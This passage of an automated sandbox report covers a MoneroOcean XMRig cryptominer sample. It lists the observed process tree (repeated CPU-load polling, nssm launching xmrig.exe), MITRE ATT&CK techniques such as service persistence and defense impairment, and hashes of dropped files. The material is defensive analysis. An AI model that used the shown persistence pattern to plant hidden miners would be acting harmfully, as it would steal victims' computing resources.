    timeout /t 1
    3⤵
    PID:1848
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:700
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4276
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4732
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2564
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:912
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2872
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2764
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4748
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1600
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4772
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2352
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3632
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4592
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:312
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4856
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:96
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4392
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4580
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4360
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2268
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1948
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:376
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2828
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2124
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1444
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2668
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4312
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3440
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2840
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1112
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1888
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2836
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4544
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:164
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3936
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3324
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3528
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1432
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2144
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1032
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2288
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2604
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3984
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3548
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4584
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1376
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4004
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4120
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4388
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4268
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3428
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2964
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3720
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1608
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2968
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:524
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3088
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4152
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4080
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4872
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4512
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4928
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3552
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4540
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4932
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2620
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2884
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:844
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4384
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:200
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4716
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3200
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3696
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2772
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1768
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:4804
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1624
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4520
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3952
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4860
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4252
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1152
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:360
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4620
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2788
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4272
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4848
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2652
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4036
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4224
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    - Delays execution with timeout.exe
    PID:3884
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:916
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2212
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1520
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:420
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:2928
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2112
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:664
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1532
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3680
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:816
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:692
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2948
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2984
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:648
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:1776
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:2476
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:1268
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4108
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1620
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3008
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2336
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:4892
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3004
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4280
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:1100
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:3760
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:3924
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3044
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4884
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:4896
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c wmic cpu get loadpercentage
    3⤵
    PID:3712
  - - C:\Windows\System32\Wbem\WMIC.exe
      wmic cpu get loadpercentage
      4⤵
      PID:4352
- - C:\Windows\system32\timeout.exe
    timeout /t 1
    3⤵
    PID:2216

C:\Users\Admin\moneroocean\nssm.exe
C:\Users\Admin\moneroocean\nssm.exe
1⤵
- Executes dropped EXE
PID:4628
- C:\Users\Admin\moneroocean\xmrig.exe
  "C:\Users\Admin\moneroocean\xmrig.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  PID:4260

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ea6243fdb2bfcca2211884b0a21a0afc

SHA1
2eee5232ca6acc33c3e7de03900e890f4adf0f2f

SHA256
5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8

SHA512
189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d77dd5381eeb34c510fef02769326878

SHA1
9df9b47cbf3ce00fb9e64dea8eef0da4271c9f32

SHA256
49ff698eaab8b39d2254551057f14cbf417792a07e2c29e6439ab9378bfb9197

SHA512
f4a455836a4a66e654a1b4647891fe5ea554a2fd6ac0fdb0b37ab757f2569c1f090df7d62372ddbab2b0a1d88c209dc1d216f7ef484feaab0708c20a70864c1f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f5b5c1a827644f285d28159857135d4d

SHA1
dcef44329d6d59931265b898f71b77b439698743

SHA256
1aa96aa8c4b7b3fa110d45156ff8e333b88968be90ffa1b4c2be88369426084b

SHA512
26e655dd6e9697f0483166c5deacd9083fb62f517da1b94a415d37b0097816cf5bc7ff9eefa1b48cae52bf197470c01494e0e5fd716abca04eb7202da7113617

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7aaaadf8e75f260103900ad5272b33d0

SHA1
bb42a083d7891665a9ca6de12997e2d530db8695

SHA256
3e7b938481a7b0bcfb012fa9a6b86b64e96848f6426cfcd72a7809d64c0dde72

SHA512
0eb2c6cbf9fc83172640553d5516dac7a66548ebaeda9e892f5767eea1757c12b2b26711c5a97c4d2bd20caec4399d4a2f9927fc5b440e437a0c65b6cf09621f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b78c7a746d848494540defa218ba77cc

SHA1
b2fefa10fdf0f44167fe652dc864654c9e8dfa4d

SHA256
f0133c2a0768cf1a0be3d9069d078ed38260609738940c955f3b571416c73f47

SHA512
f8eb1201e93f179533143678855c0be02d2b70f1468203e8913081ebeb7044d52823804c62bbc9dfb87aab5c8c64f3e0b4197aa2c01177cf0e35e25998a9732d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
456055b4a4ac98c368017e232b56283d

SHA1
c31ce0136f1be902b6159afdea164a6004a73a22

SHA256
0075c8045afa5e2e9042ea7759824375442cf8a5ba4d05e1bf7c204b4c73749c

SHA512
fefd645aedcb5fa7fbdb40b52f80c061fb4146bcd69a84812763de22787f6b7cc1c17dd2d561427c3892142b2e304cab002c08d79730fb8195f26d6b7ea9daf9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
fe1329596618842400ccd5e3486ca3f5

SHA1
8efaf287e63a163ce708a9eb01e04dddbc4076ed

SHA256
e7ed03b437a9c2a9f304a622649a04092270ff2c50f21511604f6a7933fe0ab9

SHA512
e0a63d7dc020ddb563505e0b1d46d1945a6635e73fd176e6e7a461df1be4027273a16e1f5ec217a2e0208b6f2ff36b000ad184d4bf65f6cdf31489ff1d295d52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
98eb27843fefb2a00345c1fd0109aae7

SHA1
ce22e0638464775a78e27f1b39ad14fce8d441b7

SHA256
eff3d061683b057ee82c47475bb6277a61786757bb749f7f58474cbd0d63cf04

SHA512
02c2393b56a839a5dcde345256357d861bf835816085124fe0da802a188d38409502e71e93841b485e62dd99ee57a593b013999d8954f09203cbd7009e9813b6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0c597517148f3115a256f6973efdf98e

SHA1
cdabb28eab0a9b7b790afa9ed31a31414e153d8c

SHA256
5e73a66ff4599592cb59a1375f50271abef52eeda711b309ce79bd43d193717d

SHA512
d5cdf05b6d9fd4a5f8d7acc229a713e87e99608d1b6994c390cf61ec04b8ee0413e14e1186d009af394725ce9683a184ad657bc80f8c32e521caaa5b70a2f253

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
cb2e60d9e84e882a63e6867d010e0ae5

SHA1
c0f84394c7523d14faad143797b0304dc13d2414

SHA256
aeb55f9a2a97e615a6b6e076071168c44d65466820fd96ad528e59e1afc23a7e

SHA512
d11e29462bc95d07c454afe76784483746e4b31bf0bac64aa9f0e38b30f977541cea16eaabe476b87d035169cbc0251ff8c519b847c99f68f4cb2c9d5dc2b0b7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
5a9c0ef2881d734da72b93c91bca591e

SHA1
37d9530c0f2a35622dbfbf3e3d9bf607f0a12264

SHA256
3ed9236afcbe6cfb13149b5d1f89bfc04cf738e9f34c130a981d69f9b117af6f

SHA512
e97a6bbbc5136caec111b216d290a93da89f118d83ea6b2c2e9ed2e1053b567e0a1060c2195edfe8981f2a0a37bb53b3b4c05b28cec38cb3d5dac506ec450e86

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0a631aeb496ba395206b22e14d274963

SHA1
071ef7b63a2056420592161fbf630c36561ec60d

SHA256
8d9abf90344ce2ba311ea5d85b7c3fa5670c57bd19cc87c7446e5bbe78b9e271

SHA512
15a2c3d088a702dc86a52b7fe3498f311a0fb28f2804adf11d82ab6ccfbcde08b8f938a574310c90f07850dad4086976eac43eb25c189855577fd71c89f98eb2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
342fe44dfda5e4177f422d3dcb1c5721

SHA1
0e1ea010598aa2dd95d55199c16816c56a457205

SHA256
ac29691f29f3236f5625ca4304c044fb204a634abdacf31346ea9d78ee1c5ffe

SHA512
a46d0497306d3aa514b09bcef3b30feb140733399d80064a0ad371831041bc95c02f236bbcdd453dcf11b6070f59f31c7f201545390141e3a1b2a73b26b6d635

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8102b4b6711eb724f68ed24e3115557d

SHA1
5de113d36f0072ea6aa2ca93e1448415efb6288f

SHA256
ae2e5160f7b96dd0a4d1160945960389e4e1b9849fa0b7c72d64bf24ded05132

SHA512
7078f62c174845576565028f87687491cd7c10eb43e83b59a8395563de66f8be14423a8ff0d1d2029cc6dcd1ae4fc25e1903e540771895743081292bb10d59c7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_pc2gflff.xrd.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Local\Temp\script.bat

Filesize
556B

MD5
889ed31bd87dcdd18996201e93fca965

SHA1
bebcb6fa0d36fabc6edc469cc3177251bd50dbb8

SHA256
6fd0f837746697ef471db89d8fa9290114c4c2dd416020f5ad9dc1837fb16ee7

SHA512
11e131928d8a7fd30b20943aeda62a9185b9b961fc577a75a6de87635b5a89a13fcbbfbbf0abd8e6a5cdc3052ef98c40bbebb33252ec00e73fcf18debda10f0a

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp6CB4.tmp.bat

Filesize
14KB

MD5
623f6006f683afdb4b7406e3a4ec35bf

SHA1
f63f03d7338317224726eba368f1a045fa2142d7

SHA256
21d6e0b0e8135a929a77f48e00d286bfa4fc2d749a61529e559b8a5ceb63e47b

SHA512
df7ae1e436be99bbf9ec7fe1fb745c9e2dba6b99e24019b5b1f78786198f1aed465575a829e9b8141bc92f0a4c4269e140228b4335f9fa724a60f1330ad6d3ab

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
d4f8a13f8c90e2b3b2e7d30a553df39c

SHA1
5c5303ef682ffcd31e57d1abd900ba5b637d51e4

SHA256
f7fc5b53e709adc1f4116ff47656f7262d7fb2859a100b3e3a5568453485649a

SHA512
68b0b59a732fecc8b345fa0429039d36bc3031ab65198e4d3783a5c16fa768bb6562131c1db58d00ad9c4af7fd8d77aed3c2150930663280a6bbd635ba5831bd

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
c9ef9c214996db3d88f571226910c5d5

SHA1
420ba30247b1e09f706557a7704a1ebee5d3165c

SHA256
fa55a24dccbf28309642d958cbb73f5053e3a56baa0eda22d4581e0151f5f7c1

SHA512
de91ef4268e67c4fa8d7216637bd9ca69ea33b108352675c954d4719d2d58b9414df78c6ebc8f622fcfbeda4ad5f981c2a17a48f7eeae8626cefe5b6894ec68d

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
67099c11aee7715195c370daf8713cf6

SHA1
4ffe1365749d5828225c3c91efbf37524f6b4574

SHA256
91a469ac7711ea2098eeed42b648548c51a109b83fd54fac53b643a4d9f127c8

SHA512
4a4351749e0a6dfb211196af3eb892486c3df501ec6923cad96c16605e40cca3febaf908ece586e36a55b2945141140c18c0359badd0d609999aed747221145b

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
65af2c948d2b89c9a105d1fb0b467885

SHA1
1344cc7d00abe84bdbd9f35c7ce4a665e7e45773

SHA256
90f5d28d166590d5854231b924a0115ccc1ebc6c2ae56e14b787b05e83c78e4a

SHA512
37536a9629a61a83cd31f22cfb63d381bc2b13bf4bbc84f40d475b14e7e80df11434697e5b57814fccfcc04be31937aab84de5260af6321111904dfd200a92a6

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
93999c25302669f229b6bd023bb2fc82

SHA1
d8a37356c13b8a7ea22a9cde71b0fe8b075da379

SHA256
0f5fb3c5f87df12f67253ea17de33e1c53076d688bd03416e893132ca44fd218

SHA512
44a08d747e58141d3c339de0fac78b91d95547295c6de5f0f8a841fc82fd00bd7ce242f31f1a035194ef947374d279223b5edd82d014ab745118dfa8d931a48a

Download Submit
C:\Users\Admin\moneroocean\config.json

Filesize
2KB

MD5
6c3d0ee85f55236400332c5e3bfe0f05

SHA1
c290ccb6bf890c55449894af1518c3a08d2fc405

SHA256
122dc54f3b545643685c656811763f83b2840d2dcb4fed6cf3afa2a059c08c09

SHA512
e9ee8df4f7ce9597d1329a0c466401279914c90d4b76ce7204d8d1162dd065534aed700c0e11cae5da33e25650bf80f00bd0454f40c9b26a1e2603b92593b3c2

Download Submit
C:\Users\Admin\moneroocean\nssm.exe

Filesize
360KB

MD5
1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/1012-10-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

Filesize
9.9MB

Download
memory/1012-9-0x0000027D55570000-0x0000027D555E6000-memory.dmp

Filesize
472KB

Download
memory/1012-0-0x00007FF840123000-0x00007FF840124000-memory.dmp

Filesize
4KB

Download
memory/1012-51-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

Filesize
9.9MB

Download
memory/1012-5-0x0000027D552C0000-0x0000027D552E2000-memory.dmp

Filesize
136KB

Download
memory/1012-25-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

Filesize
9.9MB

Download
memory/1012-8-0x00007FF840120000-0x00007FF840B0C000-memory.dmp

Filesize
9.9MB

Download
memory/1432-137-0x0000021968480000-0x000002196848A000-memory.dmp

Filesize
40KB

Download
memory/1432-138-0x00000219686D0000-0x00000219686E2000-memory.dmp

Filesize
72KB

Download
memory/2692-58-0x00007FF83FF40000-0x00007FF84092C000-memory.dmp

Filesize
9.9MB

Download
memory/2692-60-0x00007FF83FF40000-0x00007FF84092C000-memory.dmp

Filesize
9.9MB

Download
memory/2692-59-0x00007FF83FF40000-0x00007FF84092C000-memory.dmp

Filesize
9.9MB

Download
memory/2692-462-0x00007FF83FF40000-0x00007FF84092C000-memory.dmp

Filesize
9.9MB

Download
memory/4160-181-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4160-180-0x00000000001E0000-0x0000000000200000-memory.dmp

Filesize
128KB

Download
